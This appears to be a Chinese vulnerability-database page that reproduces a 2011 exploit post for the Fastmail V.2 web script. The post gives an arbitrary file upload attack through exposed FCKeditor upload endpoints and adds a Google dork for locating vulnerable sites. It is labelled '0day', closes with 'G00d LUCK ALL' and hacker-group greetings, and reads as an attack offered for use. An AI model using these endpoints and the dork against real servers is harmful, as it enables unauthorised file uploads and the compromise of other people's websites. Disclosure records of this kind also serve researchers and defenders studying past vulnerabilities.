Fastmail V.2 Script Arbitrary File Upload Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048861 漏洞类型
发布时间 2011-08-12 更新时间 2011-08-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080086
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+] Info=================================================================

 [-] Title : Fastmail V.2 Script Arbitrary File Upload Vulnerability
 [-] Author: Net.Edit0r
 [-] Home : Black-HG.Org ~ h4ckcity.org
 [-] Website : 1337day.com
 [-] Vendor: http://fastemail.ir/
 [-] Software Link: http://dl.webalfa.net/files/FastMail_V2-(www.webalfa.ir).zip
 [-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
 [-] Date : 10/08/2011
 [-] Google Dork : "powered by fastmail ver 2.0"
 [-] Category  : webapps / 0day
 [-] Special Thanks : Amir-Magic ~ cyrus ~ Mikili ~ b3hz4d

[+] Exploit===============================================================


    [-] uploader :)

      # http://[localhost]/FCKeditor/editor/filemanager/upload/php/upload.php

      # http://[localhost]/FCKeditor/editor/filemanager/upload/test.html


  [-] Upload Testing !

      # Allow extention : "jpg','gif','jpeg','png"


^_^ G00d LUCK ALL :=)

[+] Greets===================================================================+
                                                                             +
DarkCoder, Dr.Niloo, Hurr!c4nE , hossin , _Attack_, D3adlY, 3H34N , Tre0r    +
s3cure.p0rt, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x    +
h4ckcity.org, pentesters.ir, mn-team.net [PersianGulf F0r Ever]              +
                        <3 I Love You iRAN Far==>D <3                        +
                                                                             +
=============================================================================+